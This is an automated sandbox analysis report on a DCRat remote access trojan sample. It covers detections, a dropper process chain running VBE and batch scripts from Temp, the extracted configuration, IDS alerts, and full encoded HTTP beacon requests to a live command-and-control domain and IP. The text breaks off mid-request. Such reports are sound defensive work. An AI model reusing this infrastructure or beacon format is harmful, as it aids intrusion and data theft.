Edit tour

Windows Analysis Report
5Ixz5yVfS7.exe

Overview

General Information

Sample name:	5Ixz5yVfS7.exe renamed because original name is a hash value
Original sample name:	7b4eccf10cc4fa7263646f2fce4d7f8b.exe
Analysis ID:	1583156
MD5:	7b4eccf10cc4fa7263646f2fce4d7f8b
SHA1:	06111e9aa4ae84c68208e3800ad757f1eb80c227
SHA256:	752b44a9225f3423d045835f61cedc897696680e2caeead0d472f367da14e898
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

5Ixz5yVfS7.exe (PID: 5504 cmdline: "C:\Users\user\Desktop\5Ixz5yVfS7.exe" MD5: 7B4ECCF10CC4FA7263646F2FCE4D7F8B)

wscript.exe (PID: 5908 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 5588 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\H0DkZX.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Bridgecontainer.exe (PID: 5688 cmdline: "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe" MD5: 21879480EBF05FF55A58FC933CB818A4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"1\":\"%\",\"6\":\"!\",\"I\":\"#\",\"H\":\">\",\"S\":\"$\",\"3\":\",\",\"9\":\"<\",\"5\":\"*\",\"A\":\"|\",\"i\":\"(\",\"G\":\"`\",\"4\":\"@\",\"U\":\".\",\"k\":\"~\",\"y\":\";\",\"2\":\")\",\"L\":\"^\",\"W\":\"_\",\"o\":\"-\",\"h\":\"&\",\"0\":\" \"}", "PCRT": "{\"0\":\";\",\"=\":\"(\",\"y\":\")\",\"I\":\"&\",\"x\":\"_\",\"w\":\".\",\"e\":\"$\",\"S\":\"#\",\"M\":\"%\",\"i\":\"-\",\"f\":\"!\",\"p\":\"`\",\"l\":\" \",\"j\":\"<\",\"X\":\"*\",\"b\":\"|\",\"Q\":\">\",\"6\":\",\",\"D\":\"@\",\"c\":\"^\"}", "TAG": "", "MUTEX": "xuesos_pidorasovich_dcratovich", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 0, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000005.00000002.4473483339.0000000002F3C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000002.4473483339.00000000030EB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
Process Memory Space: Bridgecontainer.exe PID: 5688	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
Process Memory Space: Bridgecontainer.exe PID: 5688	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5Ixz5yVfS7.exe", ParentImage: C:\Users\user\Desktop\5Ixz5yVfS7.exe, ParentProcessId: 5504, ParentProcessName: 5Ixz5yVfS7.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , ProcessId: 5908, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5Ixz5yVfS7.exe", ParentImage: C:\Users\user\Desktop\5Ixz5yVfS7.exe, ParentProcessId: 5504, ParentProcessName: 5Ixz5yVfS7.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , ProcessId: 5908, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5Ixz5yVfS7.exe", ParentImage: C:\Users\user\Desktop\5Ixz5yVfS7.exe, ParentProcessId: 5504, ParentProcessName: 5Ixz5yVfS7.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , ProcessId: 5908, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5Ixz5yVfS7.exe", ParentImage: C:\Users\user\Desktop\5Ixz5yVfS7.exe, ParentProcessId: 5504, ParentProcessName: 5Ixz5yVfS7.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe" , ProcessId: 5908, ProcessName: wscript.exe

Suricata Signatures

ET MALWARE DCRAT Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T05:17:06.085876+0100	2034194	1	A Network Trojan was detected	192.168.2.5	49704	141.8.192.151	80	TCP

ETPRO MALWARE DCRat Initial Checkin Server Response M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T05:17:12.379192+0100	2850862	1	Malware Command and Control Activity Detected	141.8.192.151	80	192.168.2.5	49706	TCP
2025-01-02T05:18:27.514248+0100	2850862	1	Malware Command and Control Activity Detected	141.8.192.151	80	192.168.2.5	49987	TCP
2025-01-02T05:20:28.241324+0100	2850862	1	Malware Command and Control Activity Detected	141.8.192.151	80	192.168.2.5	50009	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 5Ixz5yVfS7.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://f1069581.xsph.ru	Avira URL Cloud: Label: malware
Source: http://f1069581.xsph.ru/L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr	Avira URL Cloud: Label: malware
Source: http://f1069581.xsph.ru/	Avira URL Cloud: Label: malware
Source: http://f1069581.xsph.ru/L1nc0In.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&75bc118bb61e898f749f2e2d30ba883f=b10b73b68010ec981337a8b11094b01e&0ba6e725790744febcc21ebe8d80c3a7=ANwYTMjFGO0gTM0M2Y2YGM3Q2N3ITNzAzNwMjYwYTNiNGMyUzY2gjY&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe	Avira: detection malicious, Label: VBS/Runner.VPG

Found malware configuration

Source: 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"1\":\"%\",\"6\":\"!\",\"I\":\"#\",\"H\":\">\",\"S\":\"$\",\"3\":\",\",\"9\":\"<\",\"5\":\"*\",\"A\":\"|\",\"i\":\"(\",\"G\":\"`\",\"4\":\"@\",\"U\":\".\",\"k\":\"~\",\"y\":\";\",\"2\":\")\",\"L\":\"^\",\"W\":\"_\",\"o\":\"-\",\"h\":\"&\",\"0\":\" \"}", "PCRT": "{\"0\":\";\",\"=\":\"(\",\"y\":\")\",\"I\":\"&\",\"x\":\"_\",\"w\":\".\",\"e\":\"$\",\"S\":\"#\",\"M\":\"%\",\"i\":\"-\",\"f\":\"!\",\"p\":\"`\",\"l\":\" \",\"j\":\"<\",\"X\":\"*\",\"b\":\"|\",\"Q\":\">\",\"6\":\",\",\"D\":\"@\",\"c\":\"^\"}", "TAG": "", "MUTEX": "xuesos_pidorasovich_dcratovich", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 0, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: 5Ixz5yVfS7.exe	ReversingLabs: Detection: 68%
Source: 5Ixz5yVfS7.exe	Virustotal: Detection: 57%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 5Ixz5yVfS7.exe

Joe Sandbox ML: detected

Source: 5Ixz5yVfS7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5Ixz5yVfS7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 5Ixz5yVfS7.exe

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_0059A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0059A5F4
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005AB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_005AB8E0
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005BAAA8 FindFirstFileExA,	0_2_005BAAA8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49704 -> 141.8.192.151:80
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 141.8.192.151:80 -> 192.168.2.5:49706
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 141.8.192.151:80 -> 192.168.2.5:49987
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 141.8.192.151:80 -> 192.168.2.5:50009

Source: Joe Sandbox View	IP Address: 141.8.192.151 141.8.192.151
Source: Joe Sandbox View	IP Address: 141.8.192.151 141.8.192.151

Source: Joe Sandbox View

ASN Name: SPRINTHOSTRU SPRINTHOSTRU

Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&75bc118bb61e898f749f2e2d30ba883f=b10b73b68010ec981337a8b11094b01e&0ba6e725790744febcc21ebe8d80c3a7=ANwYTMjFGO0gTM0M2Y2YGM3Q2N3ITNzAzNwMjYwYTNiNGMyUzY2gjY&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&154d77d402106dff3d2a63610a8c9212=d1nIw4WSzh3RSZnUuJGcS5mY2p1RkVnVtJmdChlY25URYNmQYJGbSZEWjh3VZpWOHR1Y4ZVWwY0RSdnQYF1Y4FzY1lTbaNnRHh1YO52Ys5EWWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 